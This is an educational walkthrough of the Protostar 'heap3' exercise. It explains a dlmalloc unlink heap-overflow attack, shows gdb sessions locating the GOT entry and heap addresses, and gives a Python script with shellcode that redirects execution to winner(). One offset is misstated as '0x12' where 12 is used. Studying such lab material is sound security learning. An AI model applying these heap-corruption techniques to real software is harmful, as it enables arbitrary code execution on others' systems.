Protostar 0x0F - Heap3 pt 2

Prev: 0x0E - Heap3 pt 1
Next: 0x10 - Format0

Now that we know about the inner-workings of dlmalloc, is there any way for us to overwrite all of the metadata values we need to using "strcpy," which ceases copying at null bytes?

It turns out, "free" in this dlmalloc implementation has no sanity-checking on the size value, and simply expects it to be valid. Refer to this section of the code just before the unlink:


p = chunk_at_offset(p, -((long) prevsize));
unlink(p, bck, fwd);


Earlier, "chunk_at_offset" was defined as this:


 /* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr)(((char*)(p)) + (s)))


So, "unlink" is called on its current pointer plus the negative value of the previous chunk's size, and the result is stored in a pointer. The pointer is a 32-bit value, and thus, if we add a large enough integer (such as 0xfffffff#), the result will wrap around and start over from 0. This is a case of integer overflow, and is listed on the CWE Top 25 for 2019.

For more information from some of the first people to document the use of this specific integer overflow within this heap implementation, check out two popular Phrack articles: "Vudo Malloc Tricks" by MaXX and "Once Upon a Free..." by anonymous.

What happens if we use both "0xfffffffc" for both the "prev_size" and "size" values? Let's step through the relevant pieces of "free" again:

  1. Check if the chunk is a fastbin by seeing whether the size is less than or equal to 80 bytes. In this check, size is treated as its full value, which is 4,294,967,292‬. Much larger than 80.
  2. Check if the chunk is mmapped via the 0x2 bit of “size,” which is the second doubleword of the chunk metadata. 0xfffffffc does not have this bit set, so we proceed.
  3. Check the prev_inuse 0x1 bit of “size” to determine whether the chunk preceding it in memory is also free. 0xfffffffc does not have this bit set, so we proceed.
  4. The allocator will now try to coalesce the two chunks. First, it needs to reference the previous chunk. It does this by calculating the previous chunk’s pointer by subtracting “prev_size” (the first doubleword of the chunk metadata) from the current chunk’s pointer. This arithmetic, as explained earlier, results in integer overflow and instead adds 4 bytes to the current chunk header to calculate the previous chunk address.
  5. It will call the “unlink” macro on the previous chunk (using the calculated pointer from step 4) to attempt to remove it from its current linked list. The calculated previous pointer is, of course, simply four bytes ahead of the chunk being freed. Thus, the forward and backward pointers are within the user data section of the chunk.
  6. “unlink” will operate as listed in the source code above to generate our arbitrary write.

This should work! But now, the question we've postponed until now: what value do we write, and where? We might first be inclined to write to the Global Offset Table, as it is necessarily a writable section of memory, unlike compiled program instructions. We could overwrite the entry for "printf" with the address of "winner," so that when "printf" is intended to be called, "winner" is executed instead. This can be a common technique when presented with a write-what-where primitive. However, in this case it won't work: remember that "unlink" has two writes, and the second would mean that we try to write an entry from the Global Offset Table near the address of "winner," which is read-only memory.

What other section of memory is not only advantageous for us, but writable? Well, what about the heap? Since we already have an easy means of writing data to it, we could craft some shellcode that calls the "winner" function. Let's load up gdb and look for this address:


$ gdb /opt/protostar/bin/heap3
...
Reading symbols from /opt/protostar/bin/heap3...done.
(gdb) print winner
$1 = {void (void)} 0x8048864 <winner>


Let's now also break just before the first call to "free" so that we can understand the heap layout. Per the "info proc map" gdb command, we see that the heap begins at 0x804c000.


(gdb) break *main+136
Breakpoint 1 at 0x8048911: file heap3/heap3.c, line 24.
(gdb) r AAAAAAAA BBBBBBBB CCCCCCCC
...
(gdb) x/32x 0x804c000
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x43434343
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89


The chunk for buffer "a" begins at 0x804c000, and the user data begins at 0x804c008. Let's use the latter address as the value to write into the Global Offset Table, as discussed in the prior writeup.

As for the entry to overwrite, we will use "printf," which the compiler actually optimizes as "puts." Let's break before the call to "puts," step into it, then view the first instruction:


(gdb) break *main+172
Breakpoint 2 at 0x8048935: file heap3/heap3.c, line 28.
(gdb) c
...
(gdb) si
0x08048790 in puts@plt ()
(gdb) x/i $eip
0x8048790 <puts@plt>:   jmp    *0x804b128 


Perfect - 0x804b128 is the address of "puts," but let's not forget to subtract 0x12, which is the offset that "free" applies. We will use 0x804b11c.

Now, for the final piece: our shellcode. Let's simply push the address of "winner" - 0x08048864 - and call "ret." Using a free online X86 assembler, we get this "\x68\x64\x88\x04\x08\xC3." The fact that it is so short is fortunate, as the "unlink" function generates two writes, and will thus write a Global Offset Table address near our shellcode.

We should now have all we need! To recap:
  • Buffer "a" will contain some NOP padding to account for overwrites, then our shellcode. This will be provided during the regular strcpy from argv[1].
  • Buffer "b" will contain 32 dummy bytes, followed by an overflow into the metadata of buffer "c." The prev_size and size of "c" will both be overwritten with 0xfffffffc (or -4), and then there will be four dummy bytes before we provide the address of "puts" minus 12 and the address of "winner," in that order (the four dummy bytes are to account for "free" looking 4 bytes ahead as a result of "-4" for prev_size).
  • Buffer "c" will fewer than 3 bytes so as to not overwrite the prior overwrite! (3 bytes as Python adds a newline)
Here's how it all looks in Python:


import struct

buf_a = "\x90" * 12
buf_a += "\x68\x64\x88\x04\x08\xC3"
print buf_a

buf_b = "A" * 32
buf_b += struct.pack("<I", 0xfffffffc) * 2
buf_b += "A" * 4
buf_b += struct.pack("<I", 0x804b11c)
buf_b += struct.pack("<I", 0x804c008)
print buf_b


Running this code, we see:


$ /opt/protostar/bin/heap3 `python heap3.py`
that wasn't too bad now, was it? @ 1579871783


Success!

Prev: 0x0E - Heap3 pt 1
Next: 0x10 - Format0